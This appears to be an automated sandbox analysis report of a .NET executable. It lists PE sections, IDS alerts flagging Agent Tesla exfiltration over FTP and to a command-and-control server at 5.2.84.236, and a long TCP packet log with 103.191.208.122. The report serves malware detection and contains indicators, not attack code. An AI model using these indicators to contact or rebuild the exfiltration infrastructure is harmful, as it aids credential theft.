                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x1bb40x1c005fb99836ae108650e5ad677699209cc6False0.5514787946428571data5.427442310265788IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x40000x5b60x6007c26b62f896f8022014b45c5b29bd0f5False0.4192708333333333data4.119521525818458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x60000xc0x200d9e08422d3077fe0be94f8ec16840100False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x40a00x32cdata0.4273399014778325
                                        RT_MANIFEST0x43cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-09T10:51:06.765174+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.4497315.2.84.23621TCP
                                        2024-10-09T10:51:07.397881+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.4497325.2.84.23654172TCP
                                        2024-10-09T10:51:07.404047+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.4497325.2.84.23654172TCP
                                        2024-10-09T10:51:22.680290+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.4497405.2.84.23621TCP
                                        2024-10-09T10:51:23.289578+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.4497415.2.84.23659878TCP
                                        2024-10-09T10:51:23.295500+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.4497415.2.84.23659878TCP
                                        2024-10-09T10:51:31.312442+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.4497435.2.84.23621TCP
                                        2024-10-09T10:51:31.937083+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.4497445.2.84.23650958TCP
                                        2024-10-09T10:51:31.942584+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.4497445.2.84.23650958TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 9, 2024 10:50:58.751415968 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:50:58.751454115 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:50:58.752163887 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:50:58.850239992 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:50:58.850259066 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:50:59.793442011 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:50:59.794083118 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:50:59.797000885 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:50:59.797014952 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:50:59.797463894 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:50:59.847832918 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.176498890 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.223401070 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.507468939 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.507544041 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.507567883 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.507600069 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.507693052 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.507693052 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.507716894 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.551042080 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.740422964 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.740458012 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.740518093 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.740648031 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.740672112 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.740721941 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.740741968 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.740849018 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.740849018 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.741513014 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.741533995 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.741813898 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.743037939 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.743058920 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.743159056 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.974004984 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.974060059 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.974241972 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.974483967 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.974754095 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.975177050 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.975404978 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.976145029 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.976725101 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.977144003 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.977691889 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.978095055 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.978769064 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:00.978998899 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:00.979094982 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208086967 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208121061 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208261967 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208327055 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208327055 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208369970 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208395958 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208440065 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208450079 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208487988 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208523035 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208524942 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208555937 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208607912 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208695889 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.208749056 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.208843946 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.209146023 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.209259033 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.209676981 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.209770918 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.209772110 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.209798098 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.209863901 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.209882975 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.212954998 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.213069916 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.213203907 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.213361979 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.213423967 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.213525057 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.213687897 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.213869095 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.213927984 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.214025021 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.296521902 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.296663046 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.296730042 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.296730042 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.296749115 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.296853065 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.441313982 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.441435099 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.441478014 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.441710949 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.441737890 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.441873074 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.442286015 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.442389965 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.442642927 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.442742109 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.442751884 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.442781925 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.442841053 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.442841053 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.443284988 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.443408012 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.443583012 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.443722010 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.443921089 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.444022894 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.444024086 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.444048882 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.444197893 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.444574118 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.444657087 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.444751978 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.444885969 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.445457935 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.445524931 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.445544004 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.445555925 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.445569992 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.445597887 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.445599079 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.445611000 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.445657969 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.445766926 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.446310997 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.446479082 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.529880047 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.530095100 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.530098915 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.530126095 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.530185938 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.530267954 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.530365944 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.530559063 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.531132936 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.531233072 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.531445026 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.531521082 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.531522036 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.531558990 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.531605959 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.531613111 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.531613111 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.531625986 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.531708956 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.531708956 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.531972885 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.532038927 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.532380104 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.532576084 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.532772064 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.532835007 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.533112049 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.533186913 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.533230066 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.533271074 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.533299923 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.533309937 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.533323050 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.533447981 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.675071001 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.675343990 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.675400972 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.675424099 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.675474882 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.675474882 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.675915003 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.675998926 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.676018953 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.676258087 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.676481009 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.676575899 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.676587105 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.676604986 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.676664114 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.676664114 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.676968098 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.677066088 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.677108049 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.677117109 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.677160025 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.677160025 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.678102970 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.678210020 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.678257942 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.678267002 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.678298950 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.678320885 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.678792953 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.678894043 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.678906918 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.679004908 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.679006100 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.679029942 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.679104090 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.679245949 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.679480076 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.679591894 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.679610968 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.679792881 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.680135965 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.680223942 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.763699055 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.763823032 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.763868093 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.763885021 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.763936996 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.763955116 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.764110088 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.764247894 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.764611006 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.764830112 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.764885902 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.764993906 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.765218973 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.765347958 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.765419960 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.765592098 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.765746117 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.765849113 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.766319036 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.766720057 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.766828060 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.766921043 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.766938925 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.766949892 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.767008066 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.767008066 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.767441034 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.767537117 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.767543077 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.767570019 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.767616034 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.767704964 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.768341064 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.768439054 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.768454075 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.768562078 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.768582106 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.768600941 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.768666029 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.768666029 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.769064903 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.769213915 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.908695936 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.909041882 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.909075022 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.909095049 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.909145117 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.909145117 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.909316063 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.909411907 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.909497976 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.909573078 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.910021067 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.910147905 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.910213947 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.910213947 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.910223007 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.910270929 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.910593033 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.910800934 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.911034107 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.911109924 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.911209106 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.911290884 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.911663055 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.911889076 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912128925 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912236929 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912277937 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912285089 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912307024 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912319899 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912389994 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912487030 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.913067102 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.913163900 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.913232088 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.913315058 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.913817883 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.913903952 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998306990 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998472929 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998552084 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998552084 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998574018 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998603106 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998651028 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998660088 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998675108 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998706102 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998711109 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998739004 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998807907 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998809099 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.999084949 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.999241114 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.999254942 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.999336958 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.999583960 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.999744892 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000010967 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000114918 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000124931 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000149965 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000205994 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000205994 CEST49730443192.168.2.4103.191.208.122
